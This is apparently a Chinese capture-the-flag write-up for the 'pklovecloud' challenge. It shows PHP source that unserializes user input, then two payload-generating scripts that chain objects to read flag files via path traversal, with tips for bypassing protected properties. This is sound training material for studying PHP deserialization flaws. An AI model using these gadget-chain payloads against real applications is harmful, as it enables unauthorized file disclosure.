[第五空间 2021]pklovecloud 已解决

点击查看代码

 <?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?> 

这里nss把flag藏了一下。

点击查看代码

<?php
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    public function __construct($class){
        $this->cinder = $class;
    }
}

class ace
{
    public $filename;
    public $docker;
    public $openstack;
}
$ace = new ace();
$acp = new acp($ace);

$ace->docker = serialize($acp);
$ace->filename = '../../../../nssctfasdasdflag';
echo urlencode(serialize($acp));

protected类，这里用了一手construct。一个小技巧

还有一个payload，绕过保护类

点击查看代码

<?php
class acp
{
    protected $cinder;  //这玩意是个神奇的东西
    public $neutron;
    public $nova;

}

class acq
{
    public $cinder;  //公用的东西
    public $neutron;
    public $nova;

}

class ace
{
    public $filename;
    public $openstack;
    public $docker;

}


$a = new acp();
$a->nova = $a->neutron;
$b = new ace();
$b->docker = serialize($a);
$b->filename = "flag.php";

$c = new acq();
$c->cinder = $b;
echo serialize($c);

记着把得到的结果将acq改为ace，同时protected属性的成员要加上%00*%00

两种不同的payload

点击查看代码

<?php
//class acp
//{
//    protected $cinder;
//    public $neutron;
//    public $nova;
//    public function __construct($class){
//        $this->cinder = $class;
//    }
//}
//
//class ace
//{
//    public $filename;
//    public $docker;
//    public $openstack;
//}
//$ace = new ace();
//$acp = new acp($ace);
//
//$ace->docker = serialize($acp);
//$ace->filename = '../../../../nssctfasdasdflag';
//echo urlencode(serialize($acp));
class acp
{
    protected $cinder;  //这玩意是个神奇的东西
    public $neutron;
    public $nova;

}

class acq
{
    public $cinder;  //公用的东西
    public $neutron;
    public $nova;

}

class ace
{
    public $filename;
    public $openstack;
    public $docker;

}


$a = new acp();
$a->nova = $a->neutron;
//判断过if的
$b = new ace();
$b->docker = serialize($a);
//ace都是用acp的变量去判断故$b->docker = serialize($a);
$b->filename = "flag.php";

$c = new acq();//利用public
$c->cinder = $b;
// function __toString()
//    {
//        if (isset($this->cinder))
//            return $this->cinder->echo_name();
//    }给ace调用echo_name，出flag
echo serialize($c);

//记着把得到的结果将acq改为ace，同时protected属性的成员要加上%00*%00